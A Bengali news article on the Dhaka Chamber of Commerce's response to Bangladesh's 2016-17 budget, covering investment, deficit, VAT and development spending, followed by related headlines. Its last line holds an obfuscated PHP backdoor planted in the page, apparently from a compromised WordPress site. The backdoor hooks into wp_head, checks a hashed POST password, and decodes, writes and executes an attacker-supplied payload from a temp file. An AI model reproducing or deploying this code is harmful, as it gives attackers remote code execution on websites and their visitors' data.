শনিবার, ২২শে জুন, ২০২৪ খ্রিস্টাব্দ ৮ই আষাঢ়, ১৪৩১ বঙ্গাব্দ

প্রবৃদ্ধি ৭.০৫ শতাংশ করতে বিনিয়োগ বাড়াতে হবে ৫ শতাংশ : ডিসিসিআই

 
নিজস্ব প্রতিবেদক : ২০১৬-১৭ অর্থ-বছরে জিডিপি প্রবৃদ্ধি ধরা হয়েছে ৭.০৫ শতাংশ। তবে এ লক্ষ্য অর্জনের জন্য ২০১৫-১৬ অর্থবছরে বিনিয়োগ ২১.৭৮ শতাংশকে আগামী অর্থ-বছরে২৭শতাংশে উন্নীত করতে হবে। বাজেট পরবর্তী তাৎক্ষণিক প্রতিক্রিয়ায় এ কথা বলেছে ব্যবসায়ীদের সংগঠন ডিসিসিআই।এদিকে সরকারি পরিসংখ্যান অনুযায়ী গত সাত বছর ধরে বাংলাদেশে বিনিয়োগের হার ২১ থেকে ২২ শতাংশ বেশি হয় নি।

textile-ind-44368_130271

 

বৃহস্পতিবার বাজেট উপস্থাপনের পরে ঢাকা চেম্বার অব কমার্স অ্যান্ড ইন্ডাস্ট্রি(ডিসিসিআই)’র সভাপতি হোসেন খালেদ-এর সভাপতিত্বে ডিসিসিআই বোর্ড রুমে বাজেট নিয়ে সভা অনুষ্ঠিত হয়। সভায় ডিসিসিআই পরিচালনা পর্ষদের সদস্য ও ব্যবসায়ী নেতৃবৃন্দ উপস্থিত ছিলেন।

বজেট প্রতিক্রিয়ায় ডিসিসিআই দাবি করেছে, ব্যবসা পরিচালনায় ব্যয় হ্রাসের উদ্যোগ গ্রহণের পাশাপাশি ট্যাক্স এবং ভ্যাট সংগ্রহের প্রক্রিয়ার সহজীকরন করতে হবে।

 

 

সংগঠনটি বলছে, ২০১৬-১৭ অর্থবছরে বিদ্যুৎ খাতে বরাদ্দ রাখা হয়েছে ১৩ হাজার ৪০ কোটি টাকা, যা গত অর্থবছরের চেয়ে ৫.২% কম। বিদ্যুৎ খাতে আমদানি নির্ভরতা কমানোর পাশাপাশি স্থানীয় ভাবে বিদ্যুৎ উৎপাদন হ্রাসকৃত মূল্যে সরবরাহ করার প্রতি মনোযোগী হতে হবে।

এ অর্থবছরে বাজেট ঘাটতি ৯৭ হাজার ৮৫৩ কোটি টাকা, যা মোট বাজেটের ৫%। সরকার এ ঘাটতি বাজেট মেটাতে গিয়ে ব্যাংক উৎস হতে ৩৮ হাজার ৯৩৮ কোটি টাকা ঋণ গ্রহণের লক্ষ্যমাত্রা নির্ধারন করেছে।

 

২০১৫-১৬ অর্থবছরে রাজস্ব আদায়ের লক্ষমাত্রা ১ লাখ ৭৭ হাজার ৪০০ কোটি টাকা থাকলেও ২০১৬-১৭ অর্থবছরে ২ লাখ ৪২ হাজার ৭৫২ কোটি টাকা নির্ধারণ করা হয়েছে, যা গত অর্থবছরের তুলনায় প্রায় ৩৭% হারে বেড়েছে।

সহজে আদায় যোগ্য ভ্যাট থেকে এককভাবে সবচেয়ে বেশি রাজস্ব আদায়ের লক্ষমাত্রা নির্ধারণ করা হয়েছে। এতে করে নিত্যপ্রয়োজনীয় দ্রব্যসামগ্রী ক্রয়ের পরোক্ষ করের বোঝা সকল ভোক্তার উপর পড়বে। কারণ ভ্যাট থেকে ৭২ হাজার ৭৬৪ কোটি টাকা রাজস্ব আদায়ের লক্ষ্যমাত্রা নির্ধারণ করা হলেও শুল্ক থেকে প্রায় ৬০ হাজার কোটি টাকা রাজস্ব আদায়ের লক্ষ্যমাত্রা নির্ধারণ করা হয়েছে।

বর্তমান বাজেটে বার্ষিক উন্নয়ন প্রকল্প ব্যয়(এডিপি) ১ লক্ষ ১৭ হাজার ২৭ কোটি টাকা, যা মোট জিডিপি-এর ৬ শতাংশ। কিন্তু এডিপি বাস্তবায়নে ধীরগতি এ ফিন্যানসিয়াল স্পেস ব্যবহার করার সুযোগ নষ্ট করছে। কারণ ২০১৫-১৬ অর্থবছরে মার্চ পর্যন্ত এডিপি বাস্তবায়িত হয়েছে ৫০ শতাংশ। এডিপি বাস্তবায়ন দ্রুতকরণের লক্ষ্যে আন্তমন্ত্রণালয় ভিত্তিক জবাবদিহিতার জন্য একটি টাস্কফোর্স গঠন ও জবাবদিহিতা নিশ্চিত করা প্রয়োজন।

এ জাতীয় আরও খবর

গোপালগঞ্জে ‘কথা বলা’ গাছের পেছনে ছুটছে মানুষ!

১১ ওভারে ১৩০ করে রান রেট বাড়িয়ে নিল উইন্ডিজ

ছয় মাসের অন্তঃসত্ত্বা দীপিকা, বেবিবাম্প নিয়ে এলেন প্রকাশ্যে

বেশি মাংসে স্বাস্থ্যঝুঁকি

সানিয়া-শামির বিয়ের গুঞ্জন, মুখ খুললেন টেনিস সুন্দরীর বাবা

সকালেই এক পশলা বৃষ্টিতে ভিজল ঢাকা

পবিত্র হজ পালন শেষে দেশে ফিরেছেন ৩৯২০ জন‌, ৩৫ হাজীর মৃত্যু

গান ছাড়া জীবন অচল অভিনেত্রী মিমির!

বিচ্ছেদ লড়াইয়ের মাঝে সন্তান চাইলেন ব্রাড পিট

গোল মিসের মহড়া: অপেক্ষা বাড়ল ফ্রান্স ও ডাচদের

গাজায় রেড ক্রিসেন্ট দপ্তরের কাছে হামলা, নিহত ২২

অংশীদারত্বের উন্নয়নে প্রধানমন্ত্রীর নির্দেশনার প্রশংসা জয়শঙ্ক‌রের

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}